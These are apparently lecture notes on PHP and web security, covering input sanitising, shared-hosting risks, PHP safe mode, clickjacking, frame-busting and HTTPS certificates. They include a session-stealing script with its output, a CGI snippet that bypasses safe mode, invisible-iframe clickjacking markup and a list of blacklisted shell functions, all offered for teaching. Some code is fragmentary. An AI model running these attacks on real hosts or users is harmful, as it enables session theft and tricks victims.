 FILTER SANITIZE EMAIL remove all characters except letters, digits and !#$%&’*+/=?^_‘{|}~@.[]
 FILTER SANITIZE URL remove all characters except letters, digits and $_.+!*’(),{}|\\^~[]‘<>#%";/?:&=.
 FILTER SANITIZE NUMBER INT remove all characters except digits, plus and minus sign.
 ....
$email= ... ;
$sanitized = filter_var($email, FILTER_SANITIZE_EMAIL);
if (filter_var($sanitized, FILTER_VALIDATE_EMAIL)) {
echo "This sanitized email address is considered valid.";
} else {
echo "This (b) sanitized email address is considered invalid.\n";
Validate or Sanitize?
Rather than sanitizing data it is considered best practice to validate the input data and ask the user
to correct it if invalid. For example, consider a poorly conceived path sanitizing filter:
$filename= str_replace(’..’, ’.’, $_POST[’filename’]);
An improved version:
while (strpos($filename, ’..’)!=False) {
$filename = str_replace(’..’, ’.’, $filename);
However, we would be better off not sanitizing and simply rejecting a path traversal attempt: use
basename() to check.
Escape Output
When a string is output (to the browser, database, etc.) some characters in the string are not treated
as simply string ‘data’ but may have a special interpretation that may be exploited by an attacker.
For example, quotation marks enable SQL injection, HTML such as <script> enabling XSS, path
traversals ../ enabling path traversal attacks, etc.
We cannot simply filter/eliminate all of these characters/sequences as they may be legitimate
components of the data. For example, O’Sullivan is valid string data for a name.
We must therefore escape the data so that it is treated simply as string data and does not have
another interpretation. For example, O’Sullivan is escaped as O\’Sullivan when output as part of a
SQL query.
You should identify all places in your application that output data and check that the data has been
properly escaped. Remember that how you escape data depends on its destination. We escape
HTML with htmlentities(), SQL with mysql real escape string(), etc.
Shared Hosting
A server that hosts a number of different web applications and/or general users is referred to as a
shared host.
On a conventional operating system it is difficult to provide a high-level of security for a shared
hosting environment. One web-application and/or authorized user of the server host may be able to
access data of another web-application.
If your application is critical then it should be hosted by a dedicated web server that does not host
other applications nor does its host provide any other services.
Exposed Source Code
In a shared hosting environment any user who can write/deploy code on the web server can also
read your source code.
A server user (malicious or in ignorance) could deploy a web application
header(’Content-Type: text/plain’);
allowing any visitor to the web server to access any document on the server. The visitor can also
access any file on the server that web server (user) can access.
There is no perfect solution to this problem. There are a number of strategies we can adopt in order
to minimize the damage that can occur.
Different Users
The server owner should make sure that the web-server does not run as root/administrator. A best
practice is that the web server should run as a dedicated user with privileges limited to only those
needed to run the web server (principle of least privilege).
Another best practice is to store all your sensitive web application data in a database. Each webapplication developer/ower should have a different user-id and a different user-id for the back-end
However, one application (user) can access the database of another application (user) by reading the
other user’s credential file
$db_user= ’simon’;
$db_password= ’simonPassword’;
Limiting Access to Database Credentials
The Apache SetEnv directive is used to define environment variables that can be accessed from a
PHP application.
In the configuration file, owned by root:
SetEnv DB_USER "simon"
SetEnv DB_PASS "simonPassword"
The server host owner (root) should update the configuration file with the application (users)
This file should be accessible only by root (chmod o:rw httpd.conf).
While Apache should run as an ordinary user (not root), at start up its parent does briefly run as root
(in order to bind to privileged Port 80) and it reads the configuration file as root.
Make sure that phpinfo.php is not available to visitors of the website since this application displays
information about the configuration settings.
Variables defined in the Apache configuration file can be accessed via the $ SERVER superglobal
array in PHP.
$db_user= $_SERVER[’DB_USER’];
$db_password= $_SERVER[’DB_PASS’];
This configuration helps to prevent another user of the host server from discovering the web
application’s login credentials.
However, this scheme cannot be adapted to protect the userids/passwords of different application
(users) in a shared hosting environment.
Limiting Access to Session Data
By default PHP stores session data in a temporary directory that is readable and writable by all users.
It is possible to configure PHP so that these files are readable and writable only by the Apache user
(and not by the other users for whom the server hosts web pages and applications).
For example, on my Mac a dedicated user simonMAMPS runs MAMP (Apache/etc) and a snapshot of
my session files directory is:
[SF023:MAMP/tmp/php] simon% ls -l
-rw------- 1 simonMAMPS MAMPS 36 7 Nov 13:10
-rw------- 1 simonMAMPS MAMPS 28 29 Oct 14:35
These files are read and write only by user simonMAMPS; they cannot be read by the user simon (or
any other user).
However, PHP scripts run as simonMAMPS and not as the user that wrote the script (eg, simon).
Therefore, in a shared hosting environment user simon could write a script to read the session files
of another user hosting an application on this system.
Stealing Session Data with sessionSteal.php
Seach for files that begin with sess in the session directory, parse the contents and print.
header(’Content-Type: text/plain’);
$path= ini_get(’session.save_path’);
while ($filename = $handle->read()){
if (substr($filename,0,5)==’sess_’){
$data = file_get_contents("$path/$filename");
if (!empty($data)){
$_SESSION=array(); // clear out session vars
session_decode($data); // decode session data and set
session vars
echo "Session [" . substr($filename,5) . "]\n";
Stealing Session Data
An application owned by simon counts the number of visitor page views:
$_SESSION[’views’] = $_SESSION[’views’]+ 1;
$_SESSION[’views’] = 1;
// ...
User mike deploys and executes sessionSteal.php:
Session [17d08779da3de4d8601f2868f1a181b3]
Array (
[views] => 15
[user] => simon
Session [820e952d3b331387dccf89a5b9e8d850]
Array (
[views] => 15
[user] => homer
Store Session Data in a Database
We can modify PHP’s session mechanism so that the session data is stored in the user’s (application)
CREATE TABLE sessions (
id varchar(32) NOT NULL,
access int(10) unsigned,
data text,
The session data for the visitor-count script will be stored in a databasetable accessible only by user
(application) simon, while any session data foruser (application) mike is stored in his own separate
session database table.
Redefining the PHP session mechanism
PHP function session set save handler() is used to set the user-level session storage functions that
are used within PHP for storing and retrieving data associated with a session. We use it to define
new session functions that use database-based session data:
where open, close, read etc. are the new functions for session opening, closing, reading, etc.
Once we define these functions (and invoke the above in our script) then we can then use the
session functions and array (session() etc) as normal, but the session data is now stored in the
Redefining the PHP session mechanism
We assume that the user database credentials are defined in the Apache configuration file.
function _open(){
global $_sess_db; // can be referenced by the other functions
$db_user = $_SERVER[’DB_USER’];
$db_pass = $_SERVER[’DB_PASS’];
$db_host = ’localhost’;
if ($_sess_db = mysql_connect($db_host,$db_user,$db_pass)){
return mysql_select_db(’sessions’,$_sess_db);
return FALSE;
function _close(){
global $_sess_db;
return mysql_close($_sess_db);
Redefining the PHP session mechanism
function _read($id){
global $_sess_db;
$id = mysql_real_escape_string($id);
$sql = "SELECT data FROM sessions WHERE id = ’$id’";
if ($result = mysql_query($sql, $_sess_db)) {
if (mysql_num_rows($result)) {
$record = mysql_fetch_assoc($result);
return $record[’data’];
return ’’;
function _write($id, $data){
global $_sess_db;
$access = time();
$id = mysql_real_escape_string($id);
$access = mysql_real_escape_string($access);
$data = mysql_real_escape_string($data);
$sql = "REPLACE INTO sessions VALUES (’$id’, ’$access’, ’$data’)";
return mysql_query($sql, $_sess_db);
Redefining the PHP session mechanism
function _destroy($id){
global $_sess_db;
$id = mysql_real_escape_string($id);
$sql = "DELETE FROM sessions WHERE id = ’$id’";
return mysql_query($sql, $_sess_db);
function _clean($max){
global $_sess_db;
$old = time() - $max;
$old = mysql_real_escape_string($old);
$sql = "DELETE FROM sessions WHERE access < ’$old’";
return mysql_query($sql, $_sess_db);
PHP Safe Mode
PHP Safe Mode was PHP’s attempt to solve the problem of shared hosting, among other things. It is
enabled by setting safe mode=On in php.ini.
However, it turned out to be not particularly effective, is now deprecated, and will be removed from
PHP 6.0 onwards.
PHP safe mode provides blacklisting/controls over access to functions that are considered
dangerous. For example, it is considered dangerous to permit a PHP application to escape to an
operating system shell enabling arbitrary operating system commands to be executed; in the php.ini
disable_functions = escapeshellarg, escapeshellcmd, exec, ...
However, it is easy for the web site administrator to overlook certain dangerous functions. If a single
dangerous function is overlooked then safe mode is entirely ineffective.
Blacklisting functions in Safe Mode
A ‘popular’ list of blacklisted functions:
disable_functions = escapeshellarg, escapeshellcmd, exec, passthru,
proc_close, proc_get_status, proc_open, proc_nice, proc_terminate,
shell_exec, system, ini_restore, popen, dl, disk_free_space,
diskfreespace, set_time_limit, tmpfile, fopen, readfile, fpassthru,
fsockopen, mail, ini_alter, highlight_file, openlog, show_source,
symlink, apache_child_terminate, apache_get_modules, apache_get_version,
apache_getenv, apache_note, apache_setenv, parse_ini_file
A function that is considered safe (and not on this list) might actually have some potentially ’unsafe’
behavior that was not anticipated or known about by the administrator. For example, a wrapper can
be used with fopen() to open a stream to a shell.
Also, it is possible that the application might need to use some of the functionality of a blacklisted
function. However, safe mode blacklisting is all or nothing.
Restricting functions in Safe Mode
Safe mode provides a degree separation between different applications whereby an application that
is owned by one user may not access files/etc. on the web server that are owned by different user.
Restricting a function checks whether the files or directories being operated upon have the same
UID (owner) as the script that is being executed, eg,
 move uploaded file() permitted only if the owner of the executing script is also the owner of
the uploaded file and destination directory.
 chdir() permitted only if the owner of the executing script is also the owner of the new
 session start() permitted only if the owner of the script is the same as the owner of a path directory if the default files handler is used.
 ...
However, not all functions can be restricted in this way.
File Access Controls (not just in safe mode)
Can also configure the web server so that an application does not have access to the entire file
open_basedir "/Applications/MAMP"
When a script tries to open a file with, for example, fopen() or gzopen(), the location of the file is
checked. When the file is outside the specified directory-tree, PHP will refuse to open it. All symbolic
links are resolved; so it’s not possible to avoid this restriction with a symlink.
Bypass safe mode via CGI scripts
Shared hosting environments typically offer more than just PHP hosting, for example they may
permit users to also host CGI scripts.
Executing PHP from withing a CGI wrapper will let you get around the safemode completely. Create
a file called bypass.cgi and put the following inside.
echo "Content-type: text/plain\n\n";
system("echo ’Running PHP outside of safemode!’");
Principle of Least Privilege
An entity (application) should have access to only those resources that it needs in order to carry out
its function
Specifying security controls only in terms of what is not permitted is generally dangerous as any
oversight in the policy may lead to a vulnerability that can be exploited by an attacker.
It is considered good practice to consider of security in terms of what is permitted, and that
everything else is not permitted. In this case any oversight in the policy results in a denial of access
(which can be rectified).
From the PHP site:
“The PHP safe mode is an attempt to solve the
shared-server security problem. It is architecturally incorrect to
try to solve this problem at the PHP level, but since the
alternatives at the web server and OS levels aren’t very realistic,
many people, especially ISP’s, use safe mode for now.”
HTML Frames
HTML allows for any web site to frame any URL with an IFRAME
<iframe id="moodle" class="moodle" width=800 height=300
src="" scrolling=no></iframe>
Making HTML Frames Invisible
We can make the contents of the iframe invisible; all the links in the page are still active and can be
<iframe id="moodle" class="moodle" width=800 height=300
src="" scrolling=no></iframe>
Overlaying HTML Frames
We can place things over an HTML frame
position:absolute;top:333px;left:455px; z-index:-40}
<iframe id="moodle" class="moodle" width=800 height=300
src="" scrolling=no></iframe>
<span class="fakebutton_1"><blink> CK </blink></span>
Make the frame invisible, place a fake web-page under it and trick the user into clicking on the fake
button; the user actually clicks on the button in the invisible overlay frame (It takes a bit of fiddling
with getting the fake ‘button’ in the right position on the web-page)
In the moodle web-page example, a student hosts a web-page (including the invisible frame, CK
button, etc.), tricks Simon into visiting their web-page who then clicks on this button which in turn
enables access to term test by all students!
position:absolute;top:333px;left:455px; z-index:-40}
<iframe id="moodle" class="moodle" width=800 height=300
src="" scrolling=no></iframe>
<span class="fakebutton_1"><blink> CK </blink></span>
In practice the attacking web-page should have the button as a part of something ‘useful’.
Also called UI redressing and is the same kind of security problem as CSRF.
 The victim interacts with a page that is controlled by the adversary
 The interaction requires the victim to click a given target on the page
 The page includes an iframe which points to the cross-site resource which contains the
target that the adversary wants to get clicked
 This iframe is made invisible by CSS and moved over the click-target
By apparently interacting with the page, the victim actually clicks the control on the cross-domain
This attack been used it to (unknowingly) turn on the web cam, send a tweet, accept a verification
dialogue, install a Facebook application, …
Client side controls
The Firefox plugin NoScript can detect scriptjacking attempts.
Primitive Frame Breaking
The most popular way to defend against clickjacking is to include a ”frame-breaker” script in each
page that should not be framed.
Consider the following snippet intended to defend against clickjacking:
<script>if (top!=self) top.location.href=self.location.href</script>
This simple frame breaking script, placed in victim’s (self) webpage, attempts to prevent the victim’s
page from being incorporated into a frame or iframe by forcing the parent (top, possible attacker)
window to load the current frame’s URL.
This works fine if the victim’s web-page is framed by a single page.
Busting Walmart Frame Breaking
Some sites allow their pages to be framed by their own site. This is usually done by checking
if (top.location != location) {
if(document.referrer && document.referrer.indexOf("") == -1) {
This is incorrect: indexOf is used to search for substring, is a substring of and thus the Walmart page can be framed by by an attacker who controls a
Busting (Single) Frame Breaking
The attacker puts the victim’s web-page within a frame within a frame.
<iframe src="attacker2.html">
<iframe src=""> ...
However, many browsers implement the descendant frame navigation policy: a frame can navigate
only its descendants.
In this case, when the victim’s Frame Breaking code (previous slide) which is contained within the
page loaded to the innermost frame attempts to change parent.location of the window to its page
self.location a security exception is raised since this innermost frame cannot navigate to its parent
frame under the descendant policy.
A consequence of the security exception is that the page remains in the innermost frame and subject
to clickjacking.
Facebook Frame Busting
Instead of busting out of its frame, Facebook inserts a gray semi-transparent div that covers all of
the content when a profile page is framed.
When the user clicks anywhere on the div, Facebook busts out of the frame. This allows content to
be framed while blocking clickjacking attacks.
Facebook Frame Busting
The framing code
<body style=’’overflow -x: hidden;
border: 0px; margin:0px;’’>
<iframe width=’’218000px" height="2500px"
marginheight="0" marginwidth="0" >
<script> window.scrollTo(10200,0); </script>
The scrollTo function dynamically scrolls to the center of the frame.
Facebook Frame Busting
The (original) frame busting code
if (top!=self) {
window.document.write(’’<div style=’background:black;
opacity: 0.5; filter: alpha(opacity=50);
position: absolute; top:0px; left: 0px;
width: 999px; height: 999px;
z-index: 1000001’
This div is positioned at (0,0). However, all Facebook’s content is centered in the frame.
This defence can be defeated by making the enclosing frame sufficiently large so that the center of
the frame is outside the dark div area.
Best for now Frame Breaking [OWASP-2011]
Although no completely reliable JavaScript exists (since new attacks surface regularly), a best-fornow snippet is often used:
<style> body { display : none;} </style>
if (self == top) {
var theBody = document.getElementsByTagName(’body’)[0];
55 = "block";
} else {
top.location = self.location;
Note that this should be used in combination with a secure response header.
Currently, all existing Frame Breaking code can be broken across all browsers
Server side generated defenses are on the way ....
Client-side defenses in the browser work: use NoScript (Firefox) or other commercial plugins.
Network Security
An untrusted public network.
Problems: Eve eavesdrops on network packets, Eve modifies network packets, Eve injects
messages pretending to come from Alice/Bob, ....
 Confidentiality - Data cannot be read by unintended recipients;
 Integrity - Data cannot be altered without detection;
 Authentication - Data attributed to correct originator;
A cryptographic cipher is a pair of Encrypt and Decrypt algorithms such that given plaintext
P, encryption key K1 and decryption key K2 then
D(K2,E(K1, P)) = P
 In absence of knowledge about K2, it must be not be feasible to recover P from the
ciphertext E(K1, P).
 Given P and E(K1, P), it must not be feasible to recover K1
Note that the plaintext P can be any data, including plain text.
We call E(K1, P) the ciphertext.
Symmetric/Secret key cryptography: K1 = K2;
Public key cryptography Cryptography: K1 6= K2
Secure Communication
Bob (browser) wishes to communicate securely with Alice (web server).
If Alice and Bob share a secret symmetric encryption key KAB then
B → A : E(KAB,message(eg credit card details))
and A can decrypt the message as
message = D(KAB,E(KAB,message))
A can also use KAB to send data securely to B
A → B : E(KAB,message)
If B can be sure that they only other principal who knows the secret key KAB is A then he
can feel safe about sending credit card details to the web-server.
However, how does A and B come to share the secret key KAB?
Suppose that A has a (encryption) public key KA and a corresponding (decryption) private
key K A−1 where D(KA−1 ,E(KA, P)) = P and that A’s public key is widely known.
If B knows that A’s public key is KA then B could first propose a random key KAB and send it
securely to A using
B → A : E(KA, [KAB...])
B knows that the only principal who can discover his proposed secret key KAB is A since only
A knows the private decryption key KA−1. Therefore, after the above exchange B can be sure
that only KAB is known to A.
This is a very simple example of a secure key exchange protocol: the two parties exchange a
series of messages, after which they share a secret symmetric key.
It is also a very simple variation of the SSL/TLS protocol.
The HTTPS protocol uses SSL/TLS to establish a shared secret key KAB between a browser B
and a web-server A. One the key exchange protocol has completed then all subsequent
HTTP requests and responses are encrypted using this key.
Public Key Certificates
How does the browser B come to learn that A’s public key is KA?
A public key certificate is a statement that is issued and signed by a trusted third party
declaring that a given principal (eg A) owns a given public key (eg KA).
This trusted third party is called a Certification Authority and the CA uses its own private key
to ‘sign’ the certificate. This signature can be confirmed by anyone who knows the CA’s
public key.
A browser contains the public keys of a number of well-known CAs. When a browser first
connects to a web-server over HTTPS the server sends its certificate, and if it is signed by a
CA that the browser recognizes then the browser can continue the protocol and establish
the shared key.
Msg 1 B → A hello
Msg 2 A → B certificate for KA
Msg 3 B → A E(KA, [KAB...])
Msg 4 A → B E(KAB, success...)
X500 Names for X509 Certificates
We need to be able to uniquely name principals if we are to support universal certificates
that bind principal (identities) to their public keys.
X500: A proposed hierarchical naming scheme. The intention was that X500 Distinguished
Names can be used to give a guaranteed name for everything in the world!
OU=organization unit,
CN=common name,
X500 DNs are used to name principals in X509 certificates.
X509 PKI in Practice
No clear plan on how to organize X500 directory in reality: hierarchical naming suits military
and government but does not work for businesses or individuals.
In practice, we have just one hierarchy per organization and/or have many commercial CAs
that sign certificates for each other and for other principals such as UCC and for individuals.
How does Alice learn Bob’s public key?
Alice knows and trusts a number of root CAs: eg, verisign.
Route from CA Alice trusts to Bob provides certificate chain.
Some CAs only certify end-principals: note the danger of delegating to customer’s CA (must
be trusted to delegate).
HTTPS in the Browser
We use the protocol to indicate a desire for a secure connection
from the browser to the web-server.
The secure connection is successful if the certificate is accepted as valid and that web-server
demonstrates that it can decrypt the key proposed by the browser and that the Common
Name CN in the cert matches the domain in the URL of the request/response.
This is a secure authentic connection.
Browser gives an indication if the secure connection is successful
Don’t embed HTTP content in HTTPS
If a page loads over HTTPS, but it includes some content that loads over HTTP then
 Browser (IE7/Firefox3) does not display lock and/or gives a warning to the user.
(Safari does not detect mixed content).
 However, embedded flash does not give this warning. Thus, a programmer error
<embed src=> in an HTTPS web page might be
exploitable by an attacker!
→ Check whether this applies to most recent versions of Firefox/IE.
Regardless, to be safe, should avoid specifying the protocol in embedded content. <embed
Don’t embed HTTPS content in HTTPS
The web page is http, however, its HTML source contains a form
<form method= "post"
A visitor using http does not know whether they are actually visiting the
website or some site masquerading as and therefore does not know where
their login credentials are being sent.
A request to should have resulted in a re-direct response to where the user can then enter their credentials. The visitor should be
able to ’see’ that they have a secure connection to the website they expect.
Flaws in the HTML
An old version of used GET for sensitive form attributes; on some
early browsers the URL was not secured by SSL (though the contents of the page were).
Regardless, its best to do a POST.
Many examples of errors in the html:
 BT once had a web-server with only 40-bit crypto enabled.
 Verisign once forgot the ’s’ in an http reference to a page where user provided
 ...
Modern browsers like Firefox provide a range of checks for possible ‘mistakes’. However, it
is ultimately the user’s responsibility to ensure that the connection is secure and to the right
Semantic Attacks
An attacker registers the website and obtains a valid certificate that associates
their public key with that website. Valid secure connections can be made by the browser to
A browser user might be confused about the domain of
Recall the GBK Chinese character set. It includes characters that look like /, ?, . and =.
 Attacker owns domain and gets a cert for *
 Attacker sets up a sub-domain How is the ?u interpreted?
 A browser visiting this web-site under https has a valid secure connection to (a subdomain of), however, the user of the browser probably thinks they are visiting
Extended Validation Certificates
A conventional certificate makes few claims about the true identity of the owner of a
An extended validation certificate requires a human lawyer at the CA to validate the identify
of the individual requesting the certificate. These certificates are indented for highly secure
connections such as banks.
Look at and
Man in the Middle and Elsewhere Attack
Attacker sits between and user browser.
Attacker masquerades as to user browser.
 User browser unknowingly connects to attacker via HTTP,
 Attacker connects to bank via HTTPS
Attacker masquerades as to user browser.
 User browser mistakenly connects to attacker via HTTPS,
 Attacker connects to bank via HTTPS
Problems with accepting invalid certificates
If the browser user is niave and is willing to accept invalid certificates then the browser user
will be subject to a man-in-the-middle attack.
Suppose that a malicious third party ( resides on the connection between the
browser and a web-server.
The browser sends an https connect request to This is intercepted by the man in
the middle who passes the request on to
The man in the middle responds to the browser, masquerading as but with an
invalid certificate (issued to
The browser warns the user that the certificate is invalid as its Common Name CN does not
match that of the URL ( that the user is requesting.
If the user accepts the invalid certificate then the man in the middle has a secure connection
to the user and a secure connection to the bank and can relay (and read/modify) data sent
between the user browser and the bank.